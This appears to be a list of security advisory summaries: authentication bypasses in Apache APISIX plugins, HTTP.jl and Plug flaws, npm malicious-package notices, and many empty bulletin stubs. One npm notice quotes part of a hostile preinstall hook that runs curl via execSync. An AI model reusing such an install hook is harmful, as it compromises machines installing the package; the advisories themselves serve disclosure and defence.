BIT-APISIX-2026-49872 Apache APISIX: Improper authentication in cas-auth plugin

Improper Authentication vulnerability in Apache APISIX. When the cas-auth plugin is used in a route, an attacker can possibly authenticate itself with credentials from a different source. This issue affects Apache APISIX: from 3.0.0 through 3.16.0. Users are recommended to upgrade to version...

BIT-APISIX-2026-49230 Apache APISIX: Authentication bypass in jwe-decrypt

Improper Validation of Integrity Check Value vulnerability in Apache APISIX. The jwe-decrypt plugin under default configuration is vulnerable to authentication bypass. This issue affects Apache APISIX: from 3.8.0 through 3.16.0. Users are recommended to upgrade to version 3.17.0, which fixes the...

MAL-2026-6298 Malicious code in ttal2ttml (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4 package.json declares a preinstall lifecycle script that runs node -e "tryrequire'childprocess'.execSync'curl -sf...

MINI-49GX-CFWJ-7FJP

Bulletin has no description...

MINI-MH65-R63G-HC9V

Bulletin has no description...

MINI-9VG2-RH96-QJH2

Bulletin has no description...

MINI-2W6J-22VH-HJ7J

Bulletin has no description...

MINI-G47X-FGC7-5MJ7

Bulletin has no description...

MINI-63MW-777F-62VJ

Bulletin has no description...

MINI-59WF-45GF-VJP8

Bulletin has no description...

MINI-P9PW-339C-8QV6

Bulletin has no description...

MINI-J662-PVCJ-GXPM

Bulletin has no description...

MINI-M74X-VFW5-FFM8

Bulletin has no description...

MINI-5W8G-63HF-R5C9

Bulletin has no description...

MINI-HV64-9M6J-WQWX

Bulletin has no description...

MINI-69V5-48QM-5XX2

Bulletin has no description...

MINI-GM8J-2XQR-XMM2

Bulletin has no description...

MINI-4MQ3-Q5FF-MCX7

Bulletin has no description...

MINI-44G8-3XVH-VFPC

Bulletin has no description...

MINI-VGF4-33RM-44JH

Bulletin has no description...

MINI-HQ35-4MFV-P62V

Bulletin has no description...

MINI-XH28-G2MV-7Q7V

Bulletin has no description...

MINI-5V2M-CX2C-5XR5

Bulletin has no description...

MINI-8HMV-2V5C-V2H6

Bulletin has no description...

MINI-H4F7-CH6P-C5PJ

Bulletin has no description...

MINI-H7CC-XHR9-3WXF

Bulletin has no description...

JLSEC-2026-620 WebSocket reader data race in auto-PONG/CLOSE-echo handling in HTTP.jl

Description The WebSocket reader task processed incoming frames by calling wsonincomingdata! without holding ws.sendlock. That function is not a pure parser: its auto-PONG and CLOSE-echo paths push! onto the shared ws.codec.outgoingframes vector, while application send/ping/pong/close paths mutat...

JLSEC-2026-617 Open redirect in the HTTP.jl static file server canonical redirects

Description The static file server's canonical 301 redirects index-file strip, directory trailing-slash add, and file trailing-slash strip built the Location header verbatim from the un-normalized request target. Request-target validation only requires a leading /, has no CTL bytes, and the...

JLSEC-2026-619 CR/LF injection in server-sent events (SSE) fields in HTTP.jl

Description The server-side SSE serializer wrote the single-line fields event, id, and retry verbatim to the text/event-stream wire with no CR/LF filtering, and split the multi-line data field only on \n, ignoring a bare \r that is also a valid SSE line terminator. The SSEEvent constructor...

MINI-JX9Q-WH2Q-M7Q9

Bulletin has no description...

MINI-RW29-GH9G-X6VM

Bulletin has no description...

MINI-5H66-332R-9HWF

Bulletin has no description...

MINI-H2P2-FWGF-5MM9

Bulletin has no description...

MINI-F4PP-3XHX-HFHJ

Bulletin has no description...

MINI-P5VV-M9C5-FHFJ

Bulletin has no description...

MINI-HHJV-4R3R-RF6F

Bulletin has no description...

MINI-XXMR-W2V5-PJQ8

Bulletin has no description...

MINI-84RC-J298-64Q3

Bulletin has no description...

MINI-FR34-2WR8-JPFH

Bulletin has no description...

EEF-CVE-2026-54892 Plug: quadratic-time decoding of nested query/body parameters enables denial of service

Summary Inefficient algorithmic complexity in Plug's nested-parameter decoder allows an unauthenticated remote attacker to cause denial of service. Plug.Conn.Query.decode/4 and Plug.Conn.Query.decode\each/2 parse query strings and application/x-www-form-urlencoded request bodies. When a key...

MINI-FM69-5JQ5-PCPR

Bulletin has no description...

MINI-6863-RWQ8-RM3Q

Bulletin has no description...

MINI-PMXX-9G6M-87MG

Bulletin has no description...

MAL-2026-6286 Malicious code in new-solt-1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 548ecaba7e63993f2d3c88cfb13098ae8b6c69161e2e748bd8b931dcbaec8c7b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MINI-93HG-57WX-WW2X

Bulletin has no description...

MINI-3MJF-QVW3-367F

Bulletin has no description...

MINI-X3WP-747M-7PRV

Bulletin has no description...

MINI-P4PW-7P5M-V59H

Bulletin has no description...

MINI-CMPM-M559-JM96

Bulletin has no description...

MINI-39JW-R725-5694

Bulletin has no description...